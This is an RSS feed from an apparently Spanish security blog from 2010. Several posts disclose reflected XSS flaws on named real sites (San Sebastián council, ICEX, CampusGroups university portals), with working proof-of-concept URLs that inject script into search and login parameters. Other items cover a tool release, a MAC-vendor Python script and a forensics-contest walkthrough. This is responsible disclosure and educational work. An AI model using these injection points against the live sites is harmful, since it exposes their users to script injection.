<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Erewhon-network</title>
	<atom:link href="http://erewhon-network.net/wordpress/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://erewhon-network.net/wordpress</link>
	<description></description>
	<lastBuildDate>Sun, 08 Aug 2010 04:47:50 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Múltiples Cross Site Scripting en www.donostia.org</title>
		<link>http://erewhon-network.net/wordpress/?p=231</link>
		<comments>http://erewhon-network.net/wordpress/?p=231#comments</comments>
		<pubDate>Sat, 07 Aug 2010 22:00:48 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Seguridad informática]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=231</guid>
		<description><![CDATA[El pasado día 19 de julio, descubrí múltiples vulnerabilidades XSS en la página oficial del ayuntamiento de San Sebastian informando de ello el día 20 de Julio.

Las páginas web afectadas son las siguientes:
Ayuntamiento de San Sebastián
XSS:XSS






Timeline:

19/07/2010: Se descubre XSS en múltiples páginas web creadas por la empresa novalsys.
20/07/2010: Se informa a través de correo electrónico.
21/07/2010: [...]]]></description>
			<content:encoded><![CDATA[<p>El pasado día 19 de julio, descubrí múltiples vulnerabilidades XSS en la página oficial del ayuntamiento de San Sebastian informando de ello el día 20 de Julio.<br />
<br />
Las páginas web afectadas son las siguientes:<br />
<a href="http://www.donostia.org">Ayuntamiento de San Sebastián</a><br />
<strong>XSS:</strong><a href="http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.donostia.org/info/BusquedaGSA.nsf/vBusquedaGSA/699B5CBAE7C76387C1257766002022AE?opendocument&#038;idioma=cas&#038;coleccion=Donostia&#038;query=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&#038;t=">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/donostia.org_xss/donostia.org.jpg" rel="lightbox[231]"><img src="http://www.erewhon-network.net/images/donostia.org_xss/donostia.org.jpg" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
<br />
<strong>Timeline:</strong></p>
<ul>
<li><strong>19/07/2010:</strong> Se descubre XSS en múltiples páginas web creadas por la empresa novalsys.</li>
<li><strong>20/07/2010:</strong> Se informa a través de correo electrónico.</li>
<li><strong>21/07/2010:</strong> Se confirma la recepción del correo electrónico.</li>
<li><strong>02/08/2010:</strong> Se informa nuevamente a través de correo electrónico.</li>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=231</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cross Site Scripting en múltiples páginas web creadas por la empresa novalsys</title>
		<link>http://erewhon-network.net/wordpress/?p=218</link>
		<comments>http://erewhon-network.net/wordpress/?p=218#comments</comments>
		<pubDate>Fri, 06 Aug 2010 22:00:14 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Seguridad informática]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=218</guid>
		<description><![CDATA[El pasado día 17 de julio, descubrí una vulnerabilidad de XSS en múltiples páginas web creadas por la empresa novalsys informando de ello el mismo día.


Las páginas web afectadas son las siguientes:
https://nyustern.campusgroups.com/home
XSS:XSS






https://kellogg.campusgroups.com/home
XSS:XSS






https://ross.campusgroups.com/home
XSS:XSS






https://haas.campusgroups.com/home
XSS:XSS







London Business School
XSS:XSS






https://smu.campusgroups.com/home
XSS:XSS






Fordham University
XSS:XSS






https://cua.campusgroups.com/home
XSS:XSS






https://occc.campusgroups.com/home
XSS:XSS






Cardiff University Student&#8217;s Union
XSS:XSS






Timeline:

17/07/2010: Se descubre XSS en múltiples páginas web creadas por la empresa novalsys.
17/07/2010: Se informa a través de [...]]]></description>
			<content:encoded><![CDATA[<p>El pasado día 17 de julio, descubrí una vulnerabilidad de XSS en múltiples páginas web creadas por la empresa <a href="http://www.novalsys.com/">novalsys</a> informando de ello el mismo día.<br />

<p>
Las páginas web afectadas son las siguientes:</p>
<p>https://nyustern.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="https://kellogg.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/NYU_stern_school_of business.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/NYU_stern_school_of business.jpg" alt="" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
</p>
<p>https://kellogg.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="https://kellogg.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/Kellog_School_ofManagement.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/Kellog_School_ofManagement.jpg" alt="" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
</p>
<p>https://ross.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/Michigan_Ross_School_of_business.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/Michigan_Ross_School_of_business.jpg" alt="" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
</p>
<p>https://haas.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="https://haas.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/UC_Berkeley_Haas_School_of_business.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/UC_Berkeley_Haas_School_of_business.jpg" alt="" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
<span id="more-218"></span><br />
<br />
<a href="https://clubs.london.edu/home">London Business School</a><br />
<strong>XSS</strong>:<a href="https://clubs.london.edu/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/London_Business_School.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/London_Business_School.jpg" alt="" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
</p>
<p>https://smu.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="https://smu.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/SMU_Cox_School_of_Business.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/SMU_Cox_School_of_Business.jpg" alt="" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
<br />
<a href="https://fordham.campusgroups.com/home">Fordham University</a><br />
<strong>XSS</strong>:<a href="https://fordham.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/Fordham_University.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/Fordham_University.jpg" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
</p>
<p>https://cua.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="https://cua.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/The_Catholic_University_of_America.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/The_Catholic_University_of_America.jpg" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
</p>
<p>https://occc.campusgroups.com/home</p>
<p><strong>XSS</strong>:<a href="https://occc.campusgroups.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/Oklahoma_City_Community_College.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/Oklahoma_City_Community_College.jpg" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
<br />
<a href="http://groups.cardiffstudents.com/home">Cardiff University Student&#8217;s Union</a><br />
<strong>XSS</strong>:<a href="http://groups.cardiffstudents.com/login?email=%22/%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E&amp;redirect=student_index.aspx&amp;logout_reason=Empty_Student_ID">XSS</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/novalsys_xss/Cardiff_University_Students_Union.jpg" rel="lightbox[218]"><img src="http://www.erewhon-network.net/images/novalsys_xss/Cardiff_University_Students_Union.jpg" width="437" height="400" /></a><br />
</center><br />
</p>
<hr />
<br />
<strong>Timeline:</strong></p>
<ul>
<li><strong>17/07/2010:</strong> Se descubre XSS en múltiples páginas web creadas por la empresa novalsys.</li>
<li><strong>17/07/2010:</strong> Se informa a través de msn messenger a personal de la empresa novalsys.</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=218</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cross Site Scripting en múltiples páginas web del Instituto de Comercio Exterior</title>
		<link>http://erewhon-network.net/wordpress/?p=193</link>
		<comments>http://erewhon-network.net/wordpress/?p=193#comments</comments>
		<pubDate>Thu, 05 Aug 2010 22:00:09 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Seguridad informática]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=193</guid>
		<description><![CDATA[El pasado día 16 de julio, descubrí una vulnerabilidad de XSS en múltiples páginas web del instituto de comercio exterior informando al ICEX de ello el mismo día.
La vulnerabilidad en cuestión la encontramos en el campo de búsqueda al no comprobar correctamente los caracteres introducidos.
Lás páginas web vulnerables son las siguientes:

ICEX
XSS:ICEX




Oficinas comerciales
XSS: El cross site [...]]]></description>
			<content:encoded><![CDATA[<p>El pasado día 16 de julio, descubrí una vulnerabilidad de XSS en múltiples páginas web del instituto de comercio exterior informando al ICEX de ello el mismo día.</p>
<p>La vulnerabilidad en cuestión la encontramos en el campo de búsqueda al no comprobar correctamente los caracteres introducidos.</p>
<p>Lás páginas web vulnerables son las siguientes:<br />
<br />
<a href="http://www.icex.es">ICEX</a><br />
XSS:<a href="http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.icex.es/icex/cda/controller/pageICEX/0,6558,5518394_5518983_5537315_0,00.html?ingresa-txt=%22%2F%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&#038;canal=5518971&#038;x=0&#038;y=0">ICEX</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/icex_xss/icex_xss.jpg" rel="lightbox[193]"><img src="http://www.erewhon-network.net/images/icex_xss/icex_xss.jpg" width="437" height="400" /></a><br />
</center><br />
<br />
<a href="http://www.oficinascomerciales.es">Oficinas comerciales</a><br />
XSS: El cross site scripting en este caso no se encuentra en la página web principal sino que se haya en la página web de cada oficina comercial al incluir en ellas un campo de busqueda.<br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/icex_xss/oficinascomerciales_xss.jpg" rel="lightbox[193]"><img src="http://www.erewhon-network.net/images/icex_xss/oficinascomerciales_xss.jpg" width="437" height="400" /></a><br />
</center><br />
<span id="more-193"></span><br />
<br />
<a href="http://www.fashionfromspain.com">fashionfromspain.com</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/icex_xss/fashionfromspain_xss.jpg" rel="lightbox[193]"><img src="http://www.erewhon-network.net/images/icex_xss/fashionfromspain_xss.jpg" width="437" height="400" /></a><br />
</center><br />
<br />
<a href="http://winesfromspain.com">winesfromspain.com</a><br />
<center><br />
<a title="XSS" href="http://www.erewhon-network.net/images/icex_xss/winesfromspain_xss.jpg" rel="lightbox[193]"><img src="http://www.erewhon-network.net/images/icex_xss/winesfromspain_xss.jpg" width="437" height="400" /></a><br />
</center><br />
<br />
<a href="http://www.spaintechnology.com">spaintechnology.com</a><br />
<br />
En este caso, existe un pequeño control del número de caracteres introducidos pero mediante un proxy podemos modificar la petición e inyectar nuestro código sin ningún tipo de problema.<br />
</p>
<hr />
<br />
<strong>Timeline:</strong></p>
<ul>
<li><strong>16/07/2010:</strong> Se descubre XSS en múltiples páginas web del Instituto de Comercio Exterior.</li>
<li><strong>16/07/2010:</strong> Se informa a través de email al departamento de informática del Instituto de Comercio Exterior.</li>
<li><strong>19/07/2010:</strong> Se confirma por parte del departamento de informática del ICEX la recepción del email.</li>
<li><strong>02/08/2010:</strong>Se informa nuevamente a través de email al departamento de informática del Instituto de Comercio Exterior.</li>
<li><strong>02/08/2010</strong>Se confirma por parte del departamento de informática del ICEX la recepción del email y me informan que solucionarán el problema lo antes posible</li>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=193</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Liberada BackTrack 4 R1</title>
		<link>http://erewhon-network.net/wordpress/?p=287</link>
		<comments>http://erewhon-network.net/wordpress/?p=287#comments</comments>
		<pubDate>Thu, 05 Aug 2010 20:28:20 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Seguridad informática]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=287</guid>
		<description><![CDATA[Finalmente ha sido liberada la nueva versión de BackTrack4.
Dicha nueva versión de BackTrack puede ser descargada tanto en formato ISO como en formato VMware desde:
Descarga
Para más información, BackTrack 4 R1 – Public Release
]]></description>
			<content:encoded><![CDATA[<p>Finalmente ha sido liberada la nueva versión de BackTrack4.</p>
<p>Dicha nueva versión de BackTrack puede ser descargada tanto en formato ISO como en formato VMware desde:</p>
<p><a href="http://www.backtrack-linux.org/downloads/">Descarga</a></p>
<p>Para más información, <a href="http://www.backtrack-linux.org/backtrack/backtrack-4-r1-public-release/">BackTrack 4 R1 – Public Release</a></p>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=287</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lapsec versión beta</title>
		<link>http://erewhon-network.net/wordpress/?p=277</link>
		<comments>http://erewhon-network.net/wordpress/?p=277#comments</comments>
		<pubDate>Wed, 04 Aug 2010 06:23:06 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Seguridad informática]]></category>
		<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=277</guid>
		<description><![CDATA[Hispasec sistemas S.L. ha publicado la versión beta de la herramienta Lapsec.
Con ella podremos asegurar nuestro ordenador portatil de una forma rápida y sencilla.
Las medidas implementadas en el programa son las siguientes:

Eliminación del cifrado LM de las contraseñas (en Vista y 7 no es necesario).
Sobrescritura del archivo de memoria paginada (pagefile.sys).
Ocultación del nombre del usuario [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.hispasec.com">Hispasec sistemas S.L.</a> ha publicado la versión beta de la herramienta Lapsec.</p>
<p>Con ella podremos asegurar nuestro ordenador portatil de una forma rápida y sencilla.</p>
<p>Las medidas implementadas en el programa son las siguientes:</p>
<ul>
<li>Eliminación del cifrado LM de las contraseñas (en Vista y 7 no es necesario).</li>
<li>Sobrescritura del archivo de memoria paginada (pagefile.sys).</li>
<li>Ocultación del nombre del usuario que el Sistema Operativo muestra en la pantalla de presentación.</li>
<li>Activación de la protección por contraseña del salvapantallas.</li>
<li>Eliminación de la autoejecución de archivos cuando se introducen unidades extraíbles.</li>
<li>Comprobación de la existencia de contraseña del usuario.</li>
<li>Comprobación de la complejidad de las contraseñas.</li>
<li>Compruebación de la activación de la contraseña en la consola de recuperación.</li>
<li>Deshabilitar el almacenamiento de contraseñas en el navegador Internet Explorer.</li>
<li>Deshabilitar la hibernación (hibernation.sys).</li>
<li>Deshabilitar la cuenta de administrador y de invitado del sistema.</li>
<li>Cifrado de la carpeta Mis Documentos.</li>
<li>Exportación del certificado de forma sencilla para casos de &#8220;desastre&#8221;.</li>
</ul>
<p>Descarga:<a href="http://blog.hispasec.com/laboratorio/364">Lapsec</a></p>
<p>md5: 042b3dde2f0674d0dc57b1ea1ac082f3<br />
sha1: 0b376e42e77698e6294b772601ff85e5061730af</p>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=277</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>mac_checker &#8211; Identificador de fabricante</title>
		<link>http://erewhon-network.net/wordpress/?p=170</link>
		<comments>http://erewhon-network.net/wordpress/?p=170#comments</comments>
		<pubDate>Sat, 22 May 2010 22:00:07 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Programacion -Python-]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=170</guid>
		<description><![CDATA[Pequeño programa escrito en python mediante el cual podremos saber el fabricante de una tarjeta de red a través de los 24 primeros bits de la mac.
Junto con el código python necesitaremos el siguiente fichero.
macs.txt [md5: 25b085f112eab66b490b6267d01f886c]


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
&#160;
#!/usr/bin/env python
&#160;
'''
@copyright: GPL v.3
@author: jano
@contact: borja(dot)luaces(at)gmail(dot)com
'''
&#160;
import sys,os
&#160;
COMPONENTS_FILE='macs.txt'
&#160;
try:
    import psyco
    psyco.full&#40;&#41;
except ImportError:
   [...]]]></description>
			<content:encoded><![CDATA[<p>Pequeño programa escrito en python mediante el cual podremos saber el fabricante de una tarjeta de red a través de los 24 primeros bits de la mac.</p>
<p>Junto con el código python necesitaremos el siguiente fichero.<br />
<a href="http://erewhon-network.net/downloads/python/mac_checker/macs.txt">macs.txt</a> [md5: 25b085f112eab66b490b6267d01f886c]</p>
<blockquote>

<div class="wp_syntax"><table><tr><td class="line_numbers"><pre>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
</pre></td><td class="code"><pre class="python" style="font-family:monospace;">&nbsp;
<span style="color: #808080; font-style: italic;">#!/usr/bin/env python</span>
&nbsp;
<span style="color: #483d8b;">''</span><span style="color: #483d8b;">'
@copyright: GPL v.3
@author: jano
@contact: borja(dot)luaces(at)gmail(dot)com
'</span><span style="color: #483d8b;">''</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">import</span> <span style="color: #dc143c;">sys</span>,<span style="color: #dc143c;">os</span>
&nbsp;
COMPONENTS_FILE=<span style="color: #483d8b;">'macs.txt'</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">try</span>:
    <span style="color: #ff7700;font-weight:bold;">import</span> psyco
    psyco.<span style="color: black;">full</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
<span style="color: #ff7700;font-weight:bold;">except</span> <span style="color: #008000;">ImportError</span>:
    <span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #483d8b;">'psyco not detected...'</span>
    <span style="color: #ff7700;font-weight:bold;">pass</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #008000;">len</span><span style="color: black;">&#40;</span><span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#41;</span> <span style="color: #66cc66;">!</span>= <span style="color: #ff4500;">2</span>:
    <span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #483d8b;">'Usage ./mac_checker.py M.A.C.'</span>
&nbsp;
<span style="color: #ff7700;font-weight:bold;">else</span>:
    <span style="color: #ff7700;font-weight:bold;">try</span>:
        mac = <span style="color: #dc143c;">sys</span>.<span style="color: black;">argv</span><span style="color: black;">&#91;</span><span style="color: #ff4500;">1</span><span style="color: black;">&#93;</span>
&nbsp;
        <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #008000;">len</span><span style="color: black;">&#40;</span>mac<span style="color: black;">&#41;</span><span style="color: #66cc66;">&gt;</span><span style="color: #ff4500;">8</span>:
            mac = mac<span style="color: black;">&#91;</span>:<span style="color: #ff4500;">8</span><span style="color: black;">&#93;</span>
            mac = <span style="color: #008000;">filter</span><span style="color: black;">&#40;</span><span style="color: #ff7700;font-weight:bold;">lambda</span> c: c <span style="color: #ff7700;font-weight:bold;">not</span> <span style="color: #ff7700;font-weight:bold;">in</span> <span style="color: #483d8b;">':'</span>,mac<span style="color: black;">&#41;</span>
            mac = mac<span style="color: black;">&#91;</span>:<span style="color: #ff4500;">6</span><span style="color: black;">&#93;</span>
&nbsp;
        <span style="color: #ff7700;font-weight:bold;">if</span> <span style="color: #dc143c;">os</span>.<span style="color: black;">path</span>.<span style="color: black;">exists</span><span style="color: black;">&#40;</span>COMPONENTS_FILE<span style="color: black;">&#41;</span>:
            <span style="color: #ff7700;font-weight:bold;">for</span> line <span style="color: #ff7700;font-weight:bold;">in</span> <span style="color: #008000;">open</span><span style="color: black;">&#40;</span>COMPONENTS_FILE,<span style="color: #483d8b;">'r'</span><span style="color: black;">&#41;</span>.<span style="color: black;">readlines</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>:
                <span style="color: #ff7700;font-weight:bold;">if</span> line.<span style="color: black;">find</span><span style="color: black;">&#40;</span>mac<span style="color: black;">&#41;</span> <span style="color: #66cc66;">&gt;</span>= <span style="color: #ff4500;">0</span>:
                    <span style="color: #ff7700;font-weight:bold;">print</span> line
        <span style="color: #ff7700;font-weight:bold;">else</span>:
            <span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #483d8b;">'the file does not exist'</span>
            <span style="color: #ff7700;font-weight:bold;">pass</span>
    <span style="color: #ff7700;font-weight:bold;">except</span> <span style="color: #008000;">KeyboardInterrupt</span>:
        <span style="color: #ff7700;font-weight:bold;">print</span> <span style="color: #483d8b;">''</span><span style="color: #483d8b;">'<span style="color: #000099; font-weight: bold;">\n</span><span style="color: #000099; font-weight: bold;">\n</span> Exiting...<span style="color: #000099; font-weight: bold;">\n</span>'</span><span style="color: #483d8b;">''</span></pre></td></tr></table></div>

</blockquote>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=170</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Serie S.I. – Ann skips bail – Solución</title>
		<link>http://erewhon-network.net/wordpress/?p=150</link>
		<comments>http://erewhon-network.net/wordpress/?p=150#comments</comments>
		<pubDate>Fri, 21 May 2010 10:00:43 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Serie SI -Security games]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=150</guid>
		<description><![CDATA[Pasemos a la solución del reto. La solución aquí mostrada es una de las muchas que existen y tan valida como todas ellas.
El primer paso es descargar y comprobar que el fichero ha sido correctamente descargado mediante la comparación del md5.

jano@hackbox:~/forensic/SANS/puzzle#2$ wget http://forensicscontest.com/contest02/evidence02.pcap
jano@hackbox:~/forensic/SANS/puzzle#2$ md5sum evidence02.pcap
cfac149a49175ac8e89d5b5b5d69bad3  evidence02.pcap

Como se puede comprobar el md5 del fichero descargado [...]]]></description>
			<content:encoded><![CDATA[<p>Pasemos a la solución del reto. La solución aquí mostrada es una de las muchas que existen y tan valida como todas ellas.</p>
<p>El primer paso es descargar y comprobar que el fichero ha sido correctamente descargado mediante la comparación del md5.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ wget http://forensicscontest.com/contest02/evidence02.pcap<br />
jano@hackbox:~/forensic/SANS/puzzle#2$ md5sum evidence02.pcap<br />
cfac149a49175ac8e89d5b5b5d69bad3  evidence02.pcap
</p></blockquote>
<p>Como se puede comprobar el md5 del fichero descargado coincide con el md5 [cfac149a49175ac8e89d5b5b5d69bad3] del fichero alojado en la url por lo que es el mismo.</p>
<p>Pasamos ahora  ver el contenido del mismo. Para ello vamos a emplear la herramienta tshark.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ tshark -r evidence02.pcap
</p></blockquote>
<p>Tras ver la captura, confirmamos que aparece el envio de no uno sino dos emails desde la dirección ip 192.168.1.159 por lo que vamos a pasarle un filtro tanto smtp como ip.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ tshark -r evidence02.pcap -R &#8220;smtp &amp;&amp; ip.src== 192.168.1.159&#8243;
</p></blockquote>
<p>De esta captura podemos destacar los siguientes datos:<br />
El primer email se ha enviado desde la dirección de correo &#8220;sneakyg33k@aol.com&#8221; a la dirección &#8220;sec558@gmail.com&#8221; cuyo asunto es &#8220;lunch next week&#8221;.</p>
<p>El segundo email se ha enviado desde la dirección &#8220;sneakyg33k@aol.com&#8221; a la dirección &#8220;mistersecretx@aol.com&#8221; cuyo asunto es &#8220;rendezvous&#8221;.</p>
<p>Sabemos también que el usuario, en base64, empleado para autenticarse frente al servidor SMTP es &#8220;c25lYWt5ZzMza0Bhb2wuY29t&#8221; cuya contraseña, igualmente codificada en base64 es &#8220;NTU4cjAwbHo=&#8221;.</p>
<p>Pasando estos dos valores por un decodificador de base64 obtenemos:<br />
c25lYWt5ZzMza0Bhb2wuY29t -&gt; sneakyg33k@aol.com<br />
NTU4cjAwbHo= -&gt; 558r00lz<br />
<span id="more-150"></span><br />
Vamos a ver ahora el contenido de los emails, para ello utilizaremos la herramienta tcpflow.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ tcpflow -r evidence02.pcap
</p></blockquote>
<p>Nos creara 4 ficheros:<br />
064.012.102.142.00587-192.168.001.159.01036<br />
064.012.102.142.00587-192.168.001.159.01038<br />
192.168.001.159.01036-064.012.102.142000587<br />
192.168.001.159.01038-064.012.102.142.00587</p>
<p>Estos 4 ficheros van emparejados dos a dos y son las &#8220;conversaciones&#8221; mantenidas entre cliente y servidor. De ellos, el que nos interesa es &#8220;192.168.001.159.01038-064.012.102.142.00587&#8243; por lo que procedemos a su analisis.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ cat 192.168.001.159.01038-064.012.102.142.00587 | less
</p></blockquote>
<p>Si nos vamos desplazando por el fichero, vemos que se esta creando un email desde &#8220;sneakyg33k@aol.com&#8221; con destino &#8220;mistersecretx@aol.com&#8221; cuyo asunto es &#8220;rendezvous&#8221; y cuyo cuerpo contiene la siguiente frase &#8220;Hi sweetheart! Bring your fake passport and bathing suit. Address attacched. Love, Ann&#8221;. También podemos comprobar como se adjunta el fichero &#8220;secretrendezvous.docx&#8221;.</p>
<p>Vamos a ver que contiene ese fichero. Para ello, lo primero que tenemos que hacer es sacarlo de la captura por lo que vamos a hacer uso de sed.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ sed -n &#8216;61,3701p;3701q 192.168.001.159.01038-064.012.102.142.00587 &gt; secretrendezvous.docx.base64
</p></blockquote>
<p>Bien, pero os preguntareis porque he utilizado los valores 61 y 3701. He jugado un poco con wc para ver cuantas lineas contiene el fichero y la linea 61 es donde empezaría el fichero en base64 y la linea 3701 es donde acaba.</p>
<p>Ahora pasamos por openssl el fichero para decodificarlo.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ openssl enc -d -base64 -in secretrendezvous.docx.base64 -out secretrendezvous.docx
</p></blockquote>
<p>Y ya tendremos nuestro fichero adjunto &#8220;secretrendezvous.docx&#8221; del que calcularemos su md5.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ md5sum secretrendezvous.docx<br />
9e423e11db88f01bbff81172839e1923 secretrendezvous.docx
</p></blockquote>
<p>Para poder extraer la imagen del fichero, no tendremos mas que descomprimirlo.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2$ unzip secretrendezvous.docx<br />
Archive: secretrendezvous.docx<br />
inflating: [Content_Types].xml<br />
inflating: _rels/.rels<br />
inflating: word/_rels/document.xml.rels<br />
inflating: word/document.xml<br />
extracting: word/media/image1.png<br />
